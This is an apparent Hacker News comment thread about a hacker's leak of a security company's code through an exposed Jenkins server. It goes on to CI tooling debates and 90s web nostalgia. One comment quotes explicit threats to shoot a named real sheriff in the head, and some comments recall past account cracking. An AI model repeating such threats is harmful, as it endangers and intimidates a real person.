"however, they made one of the most comedic mistakes you can still make while setting up jenkins (im actually not sure which misconfiguration leads to this): the build information for each past build contains a link to the git repository, including the bitbucket credentials in the url. genius."
No, the most comedic mistake is to have a public-facing Jenkins running. I mean in general you wouldn't make your CI accessible from the outside, but especially not Jenkins. That software has probably more CVEs every year than all of our other tooling combined.
And that's just the ones that get reported. Since core Jenkins is pretty bare-bones, most instances also have many plugins installed, and most of those aren't properly reviewed at all.
The vast majority of those Jenkins CVEs seem to be for a wide variety of plugins, so it seems someone is putting in quite a bit of work to review them.
Yes, to give credit, they do monitor the most important ones which almost everybody uses and which are usually also maintained by developers from Cloudbees. But there are over 1800 plugins for Jenkins, so at least quantitatively, most of them are not monitored.
An externally accessible Jenkins instance is just asking to get pwned.
I worked for a company a couple years ago that had Jenkins running on a Windows EC2 with a bare public IP, no TLS, and a single set of admin credentials shared by everyone. Also, the host did double duty as some sort of DBA jump box and had every possible credential.
It was like in-defense in depth. I tried to explain how crazy it was. They weren’t interested in fixing it. I moved on.
The vast majority of gigs/jobs I've had which involved touching Jenkins were for the purpose of migrating elsewhere - Gitlab, GitHub Actions, Drone, Harness...
In case anyone needs reminding, Java developers, on purpose, put a line in a logging library that can fetch and execute code when given a url string for a log statement.
You joke, but that code made it through rounds of reviews, and nobody saw anything wrong with having a logging library able to make network requests in the first place.
I honestly don't even blame the developers of Log4J that much, because after all its open source, and nobody is paying them to use it despite the idiocy surrounding shit like that.
I do however blame the developers that use Java, see things like this happen, and then continue to use it with Log4j after the patch like nothing ever happened.
The most horrible thing Jenkins does to devs is it encourages bad practice. Good practice is so cumbersome to do properly (create a secret, load secret in env through Groovy code, setup git configuration in a shell script) that, unless someone is actively monitoring them, devs are always in a temptation to just put the credentials in the git URL, we'll remove them after testing. Then one out of N times they forget and you get a security hole.
Uh, no, you just pick credentials from list in the repo config.
If you wanted to download additional repo in the jenkins script sure, but Jenkins Git plugin just accepts credential (whether its password or pub/priv key pair), just paste URL and select one from the list
It's 2023, it's far past the time that open-source projects should be made without security being the #1 concern, even above the basic functionality of the app. But Jenkins has been around since 2011, so it's understandable that the security posture is obtuse and tacked-on. It's time for some other CI project to surpass Jenkins. I won't be sorry to see it go. Security should be front and center, the first thing the user sees. The defaults should be secure out of the box, and if the user does something stupid, it should be painfully clear to everyone, even the least technical user who looks at it, that something is wrong.
That said, I doubt that what happened here was a Jenkins configuration problem, and instead something to do with the build scripts they're running on Jenkins. You can't solve every class of stupid, sadly.
A quick glance to the history of the article, I see it was edited by multiple usernames and IP address at different times. How did you come to the conclusion that it was self authored?
Funny to think about: "writing your own Wikipedia page without it getting taken down for Original Research" is a fun first hobby project to certain kinds of network-security people, as much as as "making your Github activity graph solid green" is a fun first hobby project to bot programmers.
Because this is a person that doesn't meet the notoriety requirements for Wikipedia, and goes into a level of detail that is also totally unnecessary. It is trivial to connect to different servers via VPN and creating new usernames on Wikipedia takes seconds.
They clearly do meet the notability requirements; the cites on this article are almost as long as the article itself. Notability on Wikipedia is a term of art; it refers ("mostly") to how much of the content of the article can be drawn from (ideally diverse) secondary sources. It's not an achievement award.
Wikipedia has protections against this. it is not trivial. Each change by random ip also has to be accepted by editor with permissions, and getting these permissions is not easy. It might be possible to bypass all abuse counter measures, but it takes a lot of effort and is not trivial
Easy to check on wikipedia, looks like it was created by the user Ezlev [0], who does not appear to be crimew's wikipedia acocunt, and updated by several other users over the last couple years.
Because this literal fugitive hacktivist is clearly incapable of finding creative ways to get diversified contributions to their Wikipedia page. Heck, they even proudly link to their WP page from their personal site. If they didn't write the article themself, then it was most likely a friend who's close enough to write something that screams self-authored page. Like c'mon, just look at the thing. Have you ever seen that many citations on something that isn't just spamming them trying to stave off the Wikipedia police?
It does seem weirdly detailed about someone I would mark as not really encyclopedically significant; but it has the citations and quotes so what do I know. It's one of the better Wikipedia articles in general
However, it is not self-authored as can be seen in the history of the article.
Back in 90s. I commented to a friend that there sure were a lot of NASA employees on A certain IRC channel. His response was NASA had great computers and no security.
In the 90s I would be hard-pressed to name any of my techie chums who didn't have a shell account on a NASA box, through legal or illegal means. NASA also had some great cables and satellite runs between their facilities and other partners overseas that allowed for moving warez and porn very quickly across the Atlantic when the commercial connection between the UK and USA was something like 2Mbps for the entire country.
Heck, I've heard stories that several big agencies only started deploying firewalls at their network perimeter in the late 90's. I guess one of the saving graces was that a lot of stuff like personnel records were hard to reach or still only on paper.
Perimeter security with firewalls didn't really come into vogue until the mid 1990s (post-Cheswick and Bellovin), so that seems like a pretty speedy adoption for a big agency.
Around here, it was the local college and universities. My friend, in high school at the time, pwned CS departments at both an Ivy and state college, gave out dozens of cracked SunOS accounts to BBSers and script kiddies (the password file was unshadowed...) Tying up all the dialups with IRC and the non-stop downloading of warez eventually brought the attention of sysadmins, but it went on for months.
I suspect this leak was made by the author themselves and submitted to 4chan via Tor or a VPN. I don't have hard evidence to back this up but if you read the Wikipedia article about them, it's pretty easy to put two and two together.
Their antics have been of questionable legality, and I would assume they'd try to avoid drawing too much attention, given that this is the 3rd US-based company they're trying to hack, and the US just might ask for an extradition.
Further, the conclusion about Jenkins being the attack vector is drawn without much thought or explanation, and it is also interesting that they've used the same attack vector elsewhere.
It says in the wiki entry that Switzerland does not extradite citizens unless they consent to it. She is probably already not able to leave Switzerland due to her US indictment.
Costs $20 per year and can be paid with various cryptocurrencies. Since 4chan keeps IP logs, this seems like a good deal for someone leaking company source code.
Registration was first attempted in 2012. It was denied and appealed several times and finally recognized in 2019. After some Covid-related delays, it was opened to the public in 2020. https://en.m.wikipedia.org/wiki/.gay
Who still uses Jenkins? It's an abomination of an obsolete system that is just a pain to use, manage, maintain, setup, etc. while there are much better, more featured, easier to use and maintain alternatives out there. And it has been like this for close to ten years now. It should have been ripped out in favour of either the "native" CI/CD (e.g. GitLab CI if GitLab is used for VCS, GitHub Actions if GitHub, etc.) or a modern one like Drone/Concoure/etc. years ago in any place that isn't ~two decades behind (so legacy airlines and banks?).
Switched from a company using Jenkins to one using GitLab CI, and while GitLab CI is obviously "better" in the sense that it has less historical baggage, there are actually quite a few things I'm missing. Jenkins has a plugin for pretty much every obscure thing you can imagine, which is a blessing for the user and a curse for the administrator, as Jenkins quickly becomes Frankenstein's monster. But every time I have to wade through tons of log ouput on GitLab I miss Jenkins' warnings plugin, every time no runner is picking up my job I miss the nice runner overview of Jenkins which quickly showed you what runners are actually busy with, and every time that old slow runner is grabbing all the jobs I miss the runner prioritization... I could go on here, but really, there's a lot of things that Jenkins could do through nifty plugins that GitLab CI cannot do yet. I even wrote one plugin myself for supporting our in-house Linter, really wasn't that difficult and you could hook into pretty much every little detail (which, again, can also be a curse because every plugin had the power to simply crash your Jenkins...).
EDIT: So to be clear, I'm not saying "Jenkins is better than GitLab". I would say GitLab CI is better designed, more robust and stable, but Jenkins is more configurable, extendable and has more features through it's plugin ecosystem. So personally, I wouldn't go back to Jenkins, but I also don't find it ridiculous that people still use it.
A lot of the time when old things are still around, it's not because through all the years nobody has had the idea to replace them, but because the benefit of replacing them hasn't at any point in history outweighed the hassle.
This is true for X11 and this is true for the QWERTY layout. The benefit of switching must outweigh the enormous hassle of doing so. It's easy to find something that's a little bit better, but that's simply not good enough to merit a switch.
Often they're around because when it comes around, they do a such a decent job and it's difficult to actually produce something that has that sort of advantage.
X11 is finally, finally on the way out. I have a lot of gripes with Wayland, but the day I stop needing to dive into xrandr and figure out why the screen is rotated but the mouse coordinates aren't or some other 1990s level problem will be a happy one.
QWERTY seems to be too embedded even for that, but I wonder if it gets closer to replacement the higher the percentage of software keyboards climbs vs physical ones.
> but the day I stop needing to dive into xrandr and figure out why the screen is rotated but the mouse coordinates aren't or some other 1990s level problem will be a happy one.
I'm sympathetic to wanting legacy mindhorrors replaced with modern stuff, but genuine question:
When do you ever have such problems xD
I've multimonitored on X11 for like 4 years and never experienced that.
Have you tried to multimonitor different combinations of HiDPI + regular DPI on x11? Last time I tried to make different scaling displays work together on x11 the experience was so nightmarish that I went back to windows.
I run into problems like that a lot; I guess I do edge case things. That particular example was on an Intel Atom Bay Trail tablet (garbage architecture) I resurrected with a lightweight distro. It was a huge improvement, but there was no support for auto rotation, and manual rotation turned the screen but not the mouse coordinates sent by the digitizer. This meant touch inputs were mirrored or flipped or both.
This wasn't an old-school problem, either, it was three months ago.
Do you know the cost of maintening big old systems ?
There are hundreds of people here for that
I'm not in HR, but I guess that's a lot of money spent each year, just to get the same issues we had last year
It takes a lot of money to not improve the situation
Jenkins is one of those things you configure and forget about...until you need to do it again.
Over time, there's so much stuff that it does that replacing it is a ton of work. And by work I mean verification and communication. Many developers have no idea how stuff gets built, or how dependencies are managed in the build system. You forget one thing and the build is toast. Hunting this info down takes a ridiculous amount of time.
Now expand that to X number of projects, and you're looking at a year of work...and a delay while QA checks everything again.
Why change something that mostly works fine? I don't like to change set of known issues for a set of unknowns.
Also those who want to avoid vendor lock in. Git repo might be moved around, do you like changing CI/CD scripts every time you change your git hosting service?
GHA work really well for simple stuff. For more complex in a larger organization there is no clear winner.
Big companies with data restrictions that can't have anything so much as look at the cloud, and they don't have the skills or money to set up something nicer on prem.
Bitbucket is also a big part of this story.
That results in seeing Jenkins all over the ding-darn place at Boeing, LockMart, RC, L3, NGA, etc.
Of course, all that is thrown right out the window if you wire up the Jenkins instance to the goddamn internet.
I guess that works if you want your jobs to run on a schedule; I prefer push-based (you make a commit, you push it to the central copy of the repo, and it automatically triggers jobs).
Oh they have come up with some new trash I have to learn? Great...
Say you were developing inn Angular and Python. Which one of these "alternatives" should I look in to? ie. Which is most requested by typical requiters?
Jenkins is still inherently more full-featured than anything that just runs random docker images and commands. Any replacement would need to do the hard work of actually integrating with a bunch of different language build tools in a deep way, and so far no-one's stepped up.
It doesn’t work well. It’s the JIRA of CI/CD: it is entrenched and does multiple things but doesn’t do any one thing well, and the people that decide what to buy aren’t the people who are forced to use it so they don’t care about its quality so much
Jenkins is what I want to use, because for all its clunkiness it has a better deep integration with my actual build tools than any other CI tool I've ever seen. It's a pain for the admin but it's great for the user, so if anything it's the opposite of JIRA.
I like that with Jenkins you can use groovy, which gives you some extra power as far as writing commands is considered. You don't have to do everything via shell. Equivalent shell commands can be a bit messy sometimes.
It was a bit painful to write the same stuff in GitHub actions. Jira's groovy script made loops, storing variables very easy compared to GitHub actions' YAML.
Do not attribute to NSA conspiracy what can more simply be explained by the company being fucking stupid and not caring about walking the walk of infosec
Here is how lawyers in Germany do it. They ask ISPs for the person behind the IPs (cough, cough, carrier grade NAT) and then they send cease and desist letters demanding 800€. If you sign their letter you are considered guilty but avoid further consequences, similar to a plea bargain.
It only takes a dozen people having money and fearing court for this to be profitable. The lawyer doesn't want to go to court because that costs money, he just wants you to confess and get paid.
>3. now you have IP addresses of possibly nefarious people without needing to subpoena 4chan
ahahah 4chan is almost as mainstream as Reddit. ahahahahahahaaaaaaa you really think they would waste time like this for IP addresses to "keep track of"
The "bait" this comment is referring to is that a Sheriff publicly denounced in a press conference a bunch of neo-nazi messaging spread around his town during a racecar event.
> "It's too bad Mike Chitwood isn’t safe now that I'm planning to kill him. I'm going to shoot Mike Chitwood. I'm going to kill him by shooting him to death."
> "Just shoot Chitwood in the head and he stops being a problem. They have to find a new guy to be the problem. But shooting Chitwood in the head solves an immediate problem permanently. Just shoot Chitwood in the head and murder him."
Aren't these industry awards essentially participation trophies for whoever is willing to pay? Like the notorious "Who's Who Among American High School Students" in the US.
> which makes it all so much more ironic how completely they have been hacked.
Nope, not really. It just takes one mistake and you're pwned. Imagine giving the intern a small project, you're losing your head due to your main project, no time to supervise. Boom.
/e: Or imagine an update in one of your libs/apps. In order to not to be hacked you need to make everything right. In order to hack you just need to find one mistake. Well, kinda, but you know what I mean
It only takes one mistake, but this was a pretty easy one to prevent. At a mature company with a decent security program, creating an internet facing Jenkins instance wouldn't have been approved by IT, doesn't matter if it was an intern with an overworked manager trying to set it up. So it is pretty bad that a security company failed at something as basic as minimizing their attack surface (and possibly not sufficient segmentation between the dev environment and customer data, but the post is not very detailed on that part). Not surprising, though.
I guess they meant paradoxical. Being a security company they are juicy target for an attacker's rep, meaning they are in the situation where they are both more protected than usual but also more at risk. That's the arm's race paradox I guess.
I always tell myself, if I ever start any kind of business, I’ll make sure to host my website as static content on a read only file system. And customer data will be handled by 3rd party
Apparently so, considering that this is the same person who got a hold of the No-Fly List a while back, and, you guessed it, they found it through Jenkins somehow.
>if you enjoyed this or any of my other work feel free to support me on my ko-fi. this is my only real source of income so anything goes a long way, and monthly contributions help tremendously with budgeting
As the creator was born in 1999, it's interesting to me because she's nostalgic for a period she did not fully experience. It's something I did, and it's neat yet strange to see it being done to a part of my past.
I'm not a lot older than her and have a similar fondness for that æsthetic. While it's true I didn't fully experience it, a lot of late 90's sites were still online, more or less untouched, in the late 2000's, so they were there to be appreciated even though they were a relic by then. At that time, IE stagnation was still a thing, and MIDI playback was still in browsers, so the 2008 experience of a 1998 site was probably fairly authentic.
I am in a similar age range and I am drifting towards this aesthetic. I think it's the counterculture of the increasingly sleek websites, with their overcomplicated 3D animations. Not saying either is better than the other, just it is the opposite end of the spectrum and way of still having fun when creating a website while making it feel personal.
it reminds me of the phenomena of parodying 'I Love Lucy!'. Even though it hasn't seen new episodes since 1957 it is included or mentioned in some way in nearly every popular media.
The constant revitalization of the parody through new works ensures that the future will also include some mention. I think 90s aesthetic/internet-culture is a bit like that -- the projects that include those themes beget new similar projects in the future as long as they have some level of audience exposure.
I feel this. It seems like somewhere I would have thrived and immensely enjoyed, and I hear people's nostalgia for it, but it's something I never got to experience myself. (~18yo).
Yeah, it was freakin' awesome. All my friends and I made websites. We linked to each other, shared sources of good GIFs and images, chatted on IRC, eventually shared mp3s when those were a thing. It was a seriously badass time to grow up. I regularly feel very thankful/lucky to have grown up in that time period and have my own online computer to experience all that stuff!
>It's something I did, and it's neat yet strange to see it being done to a part of my past.
Agree. I read recently that digital cameras have been taking off among younger people in the way vinyl took off among millennials. I'm excited to see how people that grew up with excessive, toxic social media manage to find better solutions for dealing with the internet
This is common among the younger people joining the internet. An the creator of SpaceHey.com was nostalgic for the days of old social media that happened when he was too young to experience it.
I have a soft spot a mile wide for SpaceHey, there's just something about the whole idea that's really nice. I'm not sure how much of it is because building a whole social media platform out of nostalgia is a very hacker-like thing to do and how much of it is just because it's nice to see a social media platform that's not so aggressively monetised and manipulative but either way I'm really happy it exists.
You might have liked Lulzsec's website. They had an auto-playing audio clip of the Love Boat TV theme and an ASCII ship above text lyrics that replaced the word 'love' with 'lulz'. It was refreshingly amusing.
Sadly archive.org doesn't have a copy from its live state—however I saved the home page at the time (MHTML ftw) and here's a video capture of it*: https://streamable.com/zon5wy
* Expires in one day
Edit: for context Lulzsec were a hacking group a decade back responsible for various headline-making leaks and website hacks.
It's been a long time since I had the sensation of going from a site with a brightly/strongly coloured background to another on white/beige and my eyes not being able to handle it. I really quite enjoyed it.
You don't really have to know what specific year they were born in, the refusal to capitalize is a dead giveaway they did not experience that time at all. Anybody of that time period would be embarrassed to do so on a public site.
Kind of funny how we carry these different meanings to mostly meaningless things.
I had an all-lowercase website for a couple years on the early web. So did many of my friends. Archive.org snapshots are 2000-2001, but they'd been around before that in many iterations.
Gah.. it's all embarrassing to look back on for other reasons...
Specifically about this style though, I feel it fits right into the blog series about "domestic cozy"[1]. It aims to be exactly that, imply super casual/low effort tone, make it feel a bit more personal, and simultaneously about ignoring social traditions that feel redundant to them. Like all trends, it takes effort to follow, and part of this is encouraging friends to turn off auto-capitalization on your phone.
So I would say it's a bit more than just trying to make something hard to read, and focusing on that bit might make you miss the rest of their storytelling process!
So it uses it/she pronouns? Usually the object pronoun is second; does that mean that it wants people to call she "it" unless they're doing something to she? That's off the chain, and sounds like meta-trolling.
There are two forms of pronouns. The correct form is multiple pronouns, “he/them” or “it/she”. They are alternatives, both can be used. I think the first is preferred.
The second form is different cases, “he/him”. I have theory that people started using that because they didn’t want to put just “he”. They were following the multiple case form and it stuck. People aren’t really specifying cases because nobody uses different cases and nobody puts cases in the multiple pronouns form.
You should check out the game Hypnospace Outlaw, which is set basically in a geocities-forum hybrid environment. It's basically a love letter to this old very personal internet.
0 times out of ten for me. First I blocked the annoying cat, then I got to the bottom, was assaulted by blinking buttons and decided I didn’t need to know what else they were saying anyway.
Interestingly, had this complaint been about an ad, parent would have been upvoted with hundreds of comments agreeing with them.
In other words, what OP is trying to say is that websites should be designed with the users goals in mind, and IMO it's fair to say that this website wasn't designed that way.
Ads are generally not nostalgic references (and when they are, you still know that it's someone ultimately trying to push your emotional buttons to get you to give them money).
Because at the end of the day, the problem with ads isn't that they're annoying, or get in the way, or are garish, or whatever else. The problem with ads is that they are ads. They're an overt attempt to hijack your attention implant ideas in your head, ideas that are antithetical to your own wellbeing.
A little cat chasing my cursor is just plain fun. No malice involved.
"pwned" is from a late-90s StarCraft custom map where the map creator typo'd "owned" as "pwned" in a message that popped up when one player beat another.
Native speaker, and title confused me even being familiar with the whole owned/pwned thing. I clicked on the article simply because I was curious why being a 4chan-using sole proprietor would be at all interesting.
No, just the ones where the result is a leak of information on some large government surveillance program, or, say, exposing incompetence of a company that sells security-related products - especially ones focused on "intellectual property".
Not that there's anything wrong with lulz as a motivation from the perspective of old-time hacker ethos.